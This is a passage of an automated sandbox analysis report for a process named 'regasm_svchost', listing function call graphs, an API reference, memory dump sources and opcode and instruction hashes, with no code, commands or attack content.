2784->2829 2830 327e74 call 77dba0 2784->2830 2831 327e74 call 77de7c 2784->2831 2832 327e74 call 77e168 2784->2832 2833 327e74 call 77e1b8 2784->2833 2834 327e74 call 77daf8 2784->2834 2835 327e74 call 77db08 2784->2835 2836 327e74 call 77dbe8 2784->2836 2837 327e74 call 77db98 2784->2837 2787 327e7a-327f62 2842 327f62 call 77f3c7 2787->2842 2843 327f62 call 77f311 2787->2843 2844 327f62 call 77f1b0 2787->2844 2845 327f62 call 77f270 2787->2845 2846 327f62 call 77f218 2787->2846 2847 327f62 call 77f368 2787->2847 2797 327f68-327ff2 2856 327ff2 call 77f816 2797->2856 2857 327ff2 call 77f878 2797->2857 2803 327ff8-32806a 2865 32806a call 680048 2803->2865 2866 32806a call 680006 2803->2866 2809 328070-3280bf 2813->2704 2814->2704 2815->2781 2816->2781 2817->2781 2819->2707 2820->2707 2821->2784 2822->2784 2823->2784 2824->2784 2825->2784 2826->2710 2827->2710 2828->2787 2829->2787 2830->2787 2831->2787 2832->2787 2833->2787 2834->2787 2835->2787 2836->2787 2837->2787 2838->2713 2839->2713 2840->2757 2841->2757 2842->2797 2843->2797 2844->2797 2845->2797 2846->2797 2847->2797 2848->2760 2849->2760 2850->2760 2851->2722 2852->2722 2853->2722 2854->2763 2855->2763 2856->2803 2857->2803 2858->2689 2859->2689 2860->2689 2861->2731 2862->2731 2863->2731 2864->2731 2865->2809 2866->2809 2867->2772 2868->2772 2869->2772 2870->2772 2871->2772 2872->2734 2873->2734 2874->2734 2875->2698 2876->2698 2877->2698 2878->2698 2879->2775 2880->2775 2881->2701 2882->2701 2883->2778 2884->2778
                                                                  APIs
                                                                  • KiUserExceptionDispatcher.NTDLL ref: 00327A0F
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1168161154.0000000000320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00320000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_320000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: DispatcherExceptionUser
                                                                  • String ID:
                                                                  • API String ID: 6842923-0
                                                                  • Opcode ID: 42b870c193557eeb71ed071a2e5c9dc71a12b0c6eea0df1b1e09f4d8dc1136df
                                                                  • Instruction ID: 2068d4f790601f8b1953880a8756732cbcbaed87392ba2ce41874f9d7ff42c99
                                                                  • Opcode Fuzzy Hash: 42b870c193557eeb71ed071a2e5c9dc71a12b0c6eea0df1b1e09f4d8dc1136df
                                                                  • Instruction Fuzzy Hash: 33F1D638906328CFCB65DF24D898799B7B1BF49306F2089D9D40AA7750DB316E8ADF41
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00327568 Relevance: 1.8, APIs: 1, Instructions: 305COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 2885 327568-32758c 3082 32758c call 32dbf3 2885->3082 3083 32758c call 32dca7 2885->3083 3084 32758c call 32dc48 2885->3084 2889 327592-327652 3026 327652 call 32ec30 2889->3026 3027 327652 call 32ed80 2889->3027 3028 327652 call 32ee41 2889->3028 3029 327652 call 32eddf 2889->3029 2898 327658-327697 3032 327697 call 32eea0 2898->3032 3033 327697 call 32ee41 2898->3033 2901 32769d-3276dc 3037 3276dc call 770012 2901->3037 3038 3276dc call 770048 2901->3038 2904 3276e2-327721 3043 327721 call 7712e0 2904->3043 3044 327721 call 771588 2904->3044 2907 327727-327766 3050 327766 call 771c81 2907->3050 3051 327766 call 771d30 2907->3051 2910 32776c-3277ab 3062 3277ab call 771e48 2910->3062 3063 3277ab call 771ef8 2910->3063 2913 3277b1-32787a 3075 32787a call 778270 2913->3075 3076 32787a call 7784e0 2913->3076 3077 32787a call 7785df 2913->3077 2922 327880-327940 3012 327940 call 779c40 2922->3012 3013 327940 call 779ce0 2922->3013 3014 327940 call 779d3f 2922->3014 3015 327940 call 779c38 2922->3015 2931 327946-327985 3023 327985 call 779e00 2931->3023 3024 327985 call 779e5f 2931->3024 3025 327985 call 779da8 2931->3025 2934 32798b-327bb0 KiUserExceptionDispatcher call 77a668 call 77a968 3064 327bb0 call 77be30 2934->3064 3065 327bb0 call 77be88 2934->3065 2957 327bb6-327bf8 3072 327bf8 call 77c347 2957->3072 3073 327bf8 call 77be30 2957->3073 3074 327bf8 call 77be88 2957->3074 2960 327bfe-327c40 3078 327c40 call 77c3a8 2960->3078 3079 327c40 call 77c408 2960->3079 2963 327c46-327d0c 3018 327d0c call 77ce47 2963->3018 3019 327d0c call 77ca71 2963->3019 3020 327d0c call 77cb20 2963->3020 3021 327d0c call 77cee0 2963->3021 3022 327d0c call 77ce6f 2963->3022 2972 327d12-327d54 3030 327d54 call 77d215 2972->3030 3031 327d54 call 77d230 2972->3031 2975 327d5a-327d9c 3034 327d9c call 77d458 2975->3034 3035 327d9c call 77d4b8 2975->3035 2978 327da2-327de4 3039 327de4 call 77da97 2978->3039 3040 327de4 call 77d9d8 2978->3040 3041 327de4 call 77da38 2978->3041 2981 327dea-327e2c 3045 327e2c call 77dba0 2981->3045 3046 327e2c call 77daf8 2981->3046 3047 327e2c call 77db08 2981->3047 3048 327e2c call 77dbe8 2981->3048 3049 327e2c call 77db98 2981->3049 2984 327e32-327e74 3052 327e74 call 77e116 2984->3052 3053 327e74 call 77e210 2984->3053 3054 327e74 call 77dba0 2984->3054 3055 327e74 call 77de7c 2984->3055 3056 327e74 call 77e168 2984->3056 3057 327e74 call 77e1b8 2984->3057 3058 327e74 call 77daf8 2984->3058 3059 327e74 call 77db08 2984->3059 3060 327e74 call 77dbe8 2984->3060 3061 327e74 call 77db98 2984->3061 2987 327e7a-327f62 3066 327f62 call 77f3c7 2987->3066 3067 327f62 call 77f311 2987->3067 3068 327f62 call 77f1b0 2987->3068 3069 327f62 call 77f270 2987->3069 3070 327f62 call 77f218 2987->3070 3071 327f62 call 77f368 2987->3071 2997 327f68-327ff2 3080 327ff2 call 77f816 2997->3080 3081 327ff2 call 77f878 2997->3081 3003 327ff8-32806a 3016 32806a call 680048 3003->3016 3017 32806a call 680006 3003->3017 3009 328070-3280bf 3012->2931 3013->2931 3014->2931 3015->2931 3016->3009 3017->3009 3018->2972 3019->2972 3020->2972 3021->2972 3022->2972 3023->2934 3024->2934 3025->2934 3026->2898 3027->2898 3028->2898 3029->2898 3030->2975 3031->2975 3032->2901 3033->2901 3034->2978 3035->2978 3037->2904 3038->2904 3039->2981 3040->2981 3041->2981 3043->2907 3044->2907 3045->2984 3046->2984 3047->2984 3048->2984 3049->2984 3050->2910 3051->2910 3052->2987 3053->2987 3054->2987 3055->2987 3056->2987 3057->2987 3058->2987 3059->2987 3060->2987 3061->2987 3062->2913 3063->2913 3064->2957 3065->2957 3066->2997 3067->2997 3068->2997 3069->2997 3070->2997 3071->2997 3072->2960 3073->2960 3074->2960 3075->2922 3076->2922 3077->2922 3078->2963 3079->2963 3080->3003 3081->3003 3082->2889 3083->2889 3084->2889
                                                                  APIs
                                                                  • KiUserExceptionDispatcher.NTDLL ref: 00327A0F
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1168161154.0000000000320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00320000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_320000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: DispatcherExceptionUser
                                                                  • String ID:
                                                                  • API String ID: 6842923-0
                                                                  • Opcode ID: ec87ea06b7706327bd8f76428aaf3f5a239ef136f8b8875aa0a20a81bf5bad0e
                                                                  • Instruction ID: 850901b9ccec926e671951c5800af19afbd80c33d69d4425ad2f386e916824f7
                                                                  • Opcode Fuzzy Hash: ec87ea06b7706327bd8f76428aaf3f5a239ef136f8b8875aa0a20a81bf5bad0e
                                                                  • Instruction Fuzzy Hash: EDF1D738906328CFCB65DF24D898799B7B1BF49306F2089D9D40AA7750DB316E8ADF41
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 003275AD Relevance: 1.8, APIs: 1, Instructions: 298COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 3085 3275ad-327652 3223 327652 call 32ec30 3085->3223 3224 327652 call 32ed80 3085->3224 3225 327652 call 32ee41 3085->3225 3226 327652 call 32eddf 3085->3226 3095 327658-327697 3229 327697 call 32eea0 3095->3229 3230 327697 call 32ee41 3095->3230 3098 32769d-3276dc 3234 3276dc call 770012 3098->3234 3235 3276dc call 770048 3098->3235 3101 3276e2-327721 3240 327721 call 7712e0 3101->3240 3241 327721 call 771588 3101->3241 3104 327727-327766 3247 327766 call 771c81 3104->3247 3248 327766 call 771d30 3104->3248 3107 32776c-3277ab 3259 3277ab call 771e48 3107->3259 3260 3277ab call 771ef8 3107->3260 3110 3277b1-32787a 3272 32787a call 778270 3110->3272 3273 32787a call 7784e0 3110->3273 3274 32787a call 7785df 3110->3274 3119 327880-327940 3209 327940 call 779c40 3119->3209 3210 327940 call 779ce0 3119->3210 3211 327940 call 779d3f 3119->3211 3212 327940 call 779c38 3119->3212 3128 327946-327985 3220 327985 call 779e00 3128->3220 3221 327985 call 779e5f 3128->3221 3222 327985 call 779da8 3128->3222 3131 32798b-327bb0 KiUserExceptionDispatcher call 77a668 call 77a968 3261 327bb0 call 77be30 3131->3261 3262 327bb0 call 77be88 3131->3262 3154 327bb6-327bf8 3269 327bf8 call 77c347 3154->3269 3270 327bf8 call 77be30 3154->3270 3271 327bf8 call 77be88 3154->3271 3157 327bfe-327c40 3275 327c40 call 77c3a8 3157->3275 3276 327c40 call 77c408 3157->3276 3160 327c46-327d0c 3215 327d0c call 77ce47 3160->3215 3216 327d0c call 77ca71 3160->3216 3217 327d0c call 77cb20 3160->3217 3218 327d0c call 77cee0 3160->3218 3219 327d0c call 77ce6f 3160->3219 3169 327d12-327d54 3227 327d54 call 77d215 3169->3227 3228 327d54 call 77d230 3169->3228 3172 327d5a-327d9c 3231 327d9c call 77d458 3172->3231 3232 327d9c call 77d4b8 3172->3232 3175 327da2-327de4 3236 327de4 call 77da97 3175->3236 3237 327de4 call 77d9d8 3175->3237 3238 327de4 call 77da38 3175->3238 3178 327dea-327e2c 3242 327e2c call 77dba0 3178->3242 3243 327e2c call 77daf8 3178->3243 3244 327e2c call 77db08 3178->3244 3245 327e2c call 77dbe8 3178->3245 3246 327e2c call 77db98 3178->3246 3181 327e32-327e74 3249 327e74 call 77e116 3181->3249 3250 327e74 call 77e210 3181->3250 3251 327e74 call 77dba0 3181->3251 3252 327e74 call 77de7c 3181->3252 3253 327e74 call 77e168 3181->3253 3254 327e74 call 77e1b8 3181->3254 3255 327e74 call 77daf8 3181->3255 3256 327e74 call 77db08 3181->3256 3257 327e74 call 77dbe8 3181->3257 3258 327e74 call 77db98 3181->3258 3184 327e7a-327f62 3263 327f62 call 77f3c7 3184->3263 3264 327f62 call 77f311 3184->3264 3265 327f62 call 77f1b0 3184->3265 3266 327f62 call 77f270 3184->3266 3267 327f62 call 77f218 3184->3267 3268 327f62 call 77f368 3184->3268 3194 327f68-327ff2 3277 327ff2 call 77f816 3194->3277 3278 327ff2 call 77f878 3194->3278 3200 327ff8-32806a 3213 32806a call 680048 3200->3213 3214 32806a call 680006 3200->3214 3206 328070-3280bf 3209->3128 3210->3128 3211->3128 3212->3128 3213->3206 3214->3206 3215->3169 3216->3169 3217->3169 3218->3169 3219->3169 3220->3131 3221->3131 3222->3131 3223->3095 3224->3095 3225->3095 3226->3095 3227->3172 3228->3172 3229->3098 3230->3098 3231->3175 3232->3175 3234->3101 3235->3101 3236->3178 3237->3178 3238->3178 3240->3104 3241->3104 3242->3181 3243->3181 3244->3181 3245->3181 3246->3181 3247->3107 3248->3107 3249->3184 3250->3184 3251->3184 3252->3184 3253->3184 3254->3184 3255->3184 3256->3184 3257->3184 3258->3184 3259->3110 3260->3110 3261->3154 3262->3154 3263->3194 3264->3194 3265->3194 3266->3194 3267->3194 3268->3194 3269->3157 3270->3157 3271->3157 3272->3119 3273->3119 3274->3119 3275->3160 3276->3160 3277->3200 3278->3200
                                                                  APIs
                                                                  • KiUserExceptionDispatcher.NTDLL ref: 00327A0F
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1168161154.0000000000320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00320000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_320000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: DispatcherExceptionUser
                                                                  • String ID:
                                                                  • API String ID: 6842923-0
                                                                  • Opcode ID: 26c217b3ed790baf80b7d2f73a03d84a0b59353d449739149e45614fc34e6ca6
                                                                  • Instruction ID: 7d45741b348f6f0ab899b3e35e9cc167f471b81788c962fe9899865f832c5ba9
                                                                  • Opcode Fuzzy Hash: 26c217b3ed790baf80b7d2f73a03d84a0b59353d449739149e45614fc34e6ca6
                                                                  • Instruction Fuzzy Hash: C1F1D638906328CFCB65DF24D898799B7B1BF49306F2089D9D40AA7750DB316E8ADF41
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 003275F2 Relevance: 1.8, APIs: 1, Instructions: 291COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • KiUserExceptionDispatcher.NTDLL ref: 00327A0F
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1168161154.0000000000320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00320000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_320000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: DispatcherExceptionUser
                                                                  • String ID:
                                                                  • API String ID: 6842923-0
                                                                  • Opcode ID: 6a868a07c032844764db4ea4cad5d9b15517ab71c05647be5bfc350bf00173bb
                                                                  • Instruction ID: cb3bcf6e60305ea00cec23682203ef4653fc998fc243f2aba3966b560a457a18
                                                                  • Opcode Fuzzy Hash: 6a868a07c032844764db4ea4cad5d9b15517ab71c05647be5bfc350bf00173bb
                                                                  • Instruction Fuzzy Hash: 30E1E638906328CFCB65DF24D898799B7B1BF49306F2089D9D40AA7750DB316E8ADF41
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00327637 Relevance: 1.8, APIs: 1, Instructions: 282COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • KiUserExceptionDispatcher.NTDLL ref: 00327A0F
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1168161154.0000000000320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00320000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_320000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: DispatcherExceptionUser
                                                                  • String ID:
                                                                  • API String ID: 6842923-0
                                                                  • Opcode ID: cf1830dde2ee70ef1a1eb725673528375b12afa97ddab1a49d6eb342d9eefbf2
                                                                  • Instruction ID: e9394824a08c715098f3aecc301b4cdc9d8ead4456f6eff4b74d5d8ae1148315
                                                                  • Opcode Fuzzy Hash: cf1830dde2ee70ef1a1eb725673528375b12afa97ddab1a49d6eb342d9eefbf2
                                                                  • Instruction Fuzzy Hash: 11E1E638906328CFCB65DF20D898799B7B1BF49306F2089D9D40AA7750DB316E8ADF41
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00327673 Relevance: 1.8, APIs: 1, Instructions: 277COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • KiUserExceptionDispatcher.NTDLL ref: 00327A0F
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1168161154.0000000000320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00320000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_320000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: DispatcherExceptionUser
                                                                  • String ID:
                                                                  • API String ID: 6842923-0
                                                                  • Opcode ID: e58d2040f3638e3cf3c7c7b7f3652f17ba0fcf0d9c19dac52e2d50decab471ed
                                                                  • Instruction ID: 160ae57403f531dfe90ca7f0003f3364f49cb12008529d245c990e1f00d681b6
                                                                  • Opcode Fuzzy Hash: e58d2040f3638e3cf3c7c7b7f3652f17ba0fcf0d9c19dac52e2d50decab471ed
                                                                  • Instruction Fuzzy Hash: 7FE1E738906328CFCB65DF60D898799B7B1BF49306F2089D9D40AA7750DB316E8ADF41
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 003276B8 Relevance: 1.8, APIs: 1, Instructions: 270COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • KiUserExceptionDispatcher.NTDLL ref: 00327A0F
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1168161154.0000000000320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00320000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_320000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: DispatcherExceptionUser
                                                                  • String ID:
                                                                  • API String ID: 6842923-0
                                                                  • Opcode ID: c6cf496d688c962f9872ce278dc5f1e1ca37cbf92863a4ffd8f164b7ff9e9438
                                                                  • Instruction ID: 170abeb587519378010e4e4eff8f902b08f04fda3b1a98f7540b2defe074dc97
                                                                  • Opcode Fuzzy Hash: c6cf496d688c962f9872ce278dc5f1e1ca37cbf92863a4ffd8f164b7ff9e9438
                                                                  • Instruction Fuzzy Hash: 26E1E638906328CFCB65DF60D898799B7B1BF49306F2089D9D40AA7750DB316E8ADF41
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 003276FD Relevance: 1.8, APIs: 1, Instructions: 263COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • KiUserExceptionDispatcher.NTDLL ref: 00327A0F
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1168161154.0000000000320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00320000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_320000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: DispatcherExceptionUser
                                                                  • String ID:
                                                                  • API String ID: 6842923-0
                                                                  • Opcode ID: 9d2766035a338cfff34edf106f58fc5235cc3307da91ce5254a569b8579491bf
                                                                  • Instruction ID: 4b866fa3ced998f3357afbeeb9d02faaa283a0027b766770a9c735dac1877c04
                                                                  • Opcode Fuzzy Hash: 9d2766035a338cfff34edf106f58fc5235cc3307da91ce5254a569b8579491bf
                                                                  • Instruction Fuzzy Hash: ADD1D638906328CFCB65DF60D898799B7B1BF49306F2089D9D40AA7750DB316E8ADF41
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00327742 Relevance: 1.8, APIs: 1, Instructions: 256COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • KiUserExceptionDispatcher.NTDLL ref: 00327A0F
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1168161154.0000000000320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00320000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_320000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: DispatcherExceptionUser
                                                                  • String ID:
                                                                  • API String ID: 6842923-0
                                                                  • Opcode ID: 4a6d84a456074ee380ffe6908c19a109d455feb65b8b25e95a65178ce9665047
                                                                  • Instruction ID: 09798b017dc173c555c2108d939c2bf68a0764abeec44f40fba9fe28863d3772
                                                                  • Opcode Fuzzy Hash: 4a6d84a456074ee380ffe6908c19a109d455feb65b8b25e95a65178ce9665047
                                                                  • Instruction Fuzzy Hash: 53D1C638906328CFCB65DF60D898799B7B1BF49306F2089D9D40AA7750DB316E8ADF41
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00327787 Relevance: 1.7, APIs: 1, Instructions: 249COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • KiUserExceptionDispatcher.NTDLL ref: 00327A0F
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1168161154.0000000000320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00320000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_320000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: DispatcherExceptionUser
                                                                  • String ID:
                                                                  • API String ID: 6842923-0
                                                                  • Opcode ID: 20fc692da55d0fd64d4a482b960f122aaacad77c8e33916604974f3e465065cb
                                                                  • Instruction ID: 05870e95ff1727af9c5a1a03dac2e47b578d5f89396e1e092860949a513c5dee
                                                                  • Opcode Fuzzy Hash: 20fc692da55d0fd64d4a482b960f122aaacad77c8e33916604974f3e465065cb
                                                                  • Instruction Fuzzy Hash: B4D1C738906328CFCB65DF60D898799B7B1BF49306F2089D9D40AA7750DB316E8ADF41
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 003277CC Relevance: 1.7, APIs: 1, Instructions: 242COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • KiUserExceptionDispatcher.NTDLL ref: 00327A0F
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1168161154.0000000000320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00320000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_320000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: DispatcherExceptionUser
                                                                  • String ID:
                                                                  • API String ID: 6842923-0
                                                                  • Opcode ID: 600f892f8d3250ac99ff18cda4efb891dd60bf6b402e99efdb6af9a29839c37b
                                                                  • Instruction ID: 29a8ea3f1dbe8476e0fa36da9c85d5a57871668f8cc8381f49ca2f072b35bfff
                                                                  • Opcode Fuzzy Hash: 600f892f8d3250ac99ff18cda4efb891dd60bf6b402e99efdb6af9a29839c37b
                                                                  • Instruction Fuzzy Hash: B2C1C638906328CFCB65DF20D898799B7B1BF49306F2089D9D40AA7750DB316E8ADF41
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00327811 Relevance: 1.7, APIs: 1, Instructions: 235COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • KiUserExceptionDispatcher.NTDLL ref: 00327A0F
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1168161154.0000000000320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00320000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_320000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: DispatcherExceptionUser
                                                                  • String ID:
                                                                  • API String ID: 6842923-0
                                                                  • Opcode ID: f6e4e2d94241de5e97de781c94ec870dccd502b8b5eb98a5ef29350b4fbef713
                                                                  • Instruction ID: c19424040c19e255010ad389c5bf7883957c7f8707d8bd59a801755a1fa79547
                                                                  • Opcode Fuzzy Hash: f6e4e2d94241de5e97de781c94ec870dccd502b8b5eb98a5ef29350b4fbef713
                                                                  • Instruction Fuzzy Hash: 1CC1C738906328CFCB65DF24D898799B7B1BF49306F2089D9D40AA7750DB316E8ADF41
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00327856 Relevance: 1.7, APIs: 1, Instructions: 228COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • KiUserExceptionDispatcher.NTDLL ref: 00327A0F
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1168161154.0000000000320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00320000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_320000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: DispatcherExceptionUser
                                                                  • String ID:
                                                                  • API String ID: 6842923-0
                                                                  • Opcode ID: 17eea6963b2abdc262514f633882f1d771f7fe8c61c14bab41ff8a467043ce28
                                                                  • Instruction ID: 3bc86ed798ba91aa3cd4c1b7537fe006623c9dd2fd6ad5d0d0fa3a4806e372a7
                                                                  • Opcode Fuzzy Hash: 17eea6963b2abdc262514f633882f1d771f7fe8c61c14bab41ff8a467043ce28
                                                                  • Instruction Fuzzy Hash: F4C1C638906328CFCB65DF20D898799B7B1BF49306F2089D9D40AA7750DB316E8ADF41
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0032789B Relevance: 1.7, APIs: 1, Instructions: 221COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • KiUserExceptionDispatcher.NTDLL ref: 00327A0F
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1168161154.0000000000320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00320000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_320000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: DispatcherExceptionUser
                                                                  • String ID:
                                                                  • API String ID: 6842923-0
                                                                  • Opcode ID: acac0efd43ef6860078d0ccaf47b5a0744c1b29693c7ece5c5e18d423c927b1b
                                                                  • Instruction ID: 86ea01b86f3693707c97782b2a172cd3112d58ca019f2c6a5bc81a8c1f6cfcd2
                                                                  • Opcode Fuzzy Hash: acac0efd43ef6860078d0ccaf47b5a0744c1b29693c7ece5c5e18d423c927b1b
                                                                  • Instruction Fuzzy Hash: 35B1C738906328CFCB65DF20D898799B7B1BF49306F2089D9D40AA7750DB316E89DF41
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 003278E0 Relevance: 1.7, APIs: 1, Instructions: 212COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • KiUserExceptionDispatcher.NTDLL ref: 00327A0F
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1168161154.0000000000320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00320000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_320000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: DispatcherExceptionUser
                                                                  • String ID:
                                                                  • API String ID: 6842923-0
                                                                  • Opcode ID: 84c04928266b7a66c5bbff6610dfcb282cfe9ed4475ff952a091e276102a31db
                                                                  • Instruction ID: 12eb43645f774a606a6a5a5f7ac39391be45c64444b06217e3c3356326b86c07
                                                                  • Opcode Fuzzy Hash: 84c04928266b7a66c5bbff6610dfcb282cfe9ed4475ff952a091e276102a31db
                                                                  • Instruction Fuzzy Hash: 06B1C638906328CFCB65DF20D898799B7B1BF49306F2089D9D40AA7750DB316E8ADF41
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0032791C Relevance: 1.7, APIs: 1, Instructions: 207COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • KiUserExceptionDispatcher.NTDLL ref: 00327A0F
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1168161154.0000000000320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00320000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_320000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: DispatcherExceptionUser
                                                                  • String ID:
                                                                  • API String ID: 6842923-0
                                                                  • Opcode ID: 6036d90bf54911cb3991a7c821be332bb0f8f0eb46de5534e1b997325e2ccb9e
                                                                  • Instruction ID: c7d56620a86d72e114412e5062fb8a96fa98c8aff7d45ed6d896d6cd558b0d4b
                                                                  • Opcode Fuzzy Hash: 6036d90bf54911cb3991a7c821be332bb0f8f0eb46de5534e1b997325e2ccb9e
                                                                  • Instruction Fuzzy Hash: 43B1B538906328CFCB65DF60D898799B7B1BF49306F2089D9D40AA7750DB316E8ADF41
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00327961 Relevance: 1.7, APIs: 1, Instructions: 200COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • KiUserExceptionDispatcher.NTDLL ref: 00327A0F
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1168161154.0000000000320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00320000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_320000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: DispatcherExceptionUser
                                                                  • String ID:
                                                                  • API String ID: 6842923-0
                                                                  • Opcode ID: 65cb7509f8acec5c013fac26b9454434e7fc6f765314daa02f0bf301088a6ad9
                                                                  • Instruction ID: ad380adaa4b31625a61d2d56bb2cff942adaa162c310c656e8bf3572c4d27519
                                                                  • Opcode Fuzzy Hash: 65cb7509f8acec5c013fac26b9454434e7fc6f765314daa02f0bf301088a6ad9
                                                                  • Instruction Fuzzy Hash: 72A1B538906328CFCB65DF60D898799B7B1BF49306F2089D9D40AA7750DB316E8ADF41
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 003279A6 Relevance: 1.7, APIs: 1, Instructions: 193COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • KiUserExceptionDispatcher.NTDLL ref: 00327A0F
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1168161154.0000000000320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00320000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
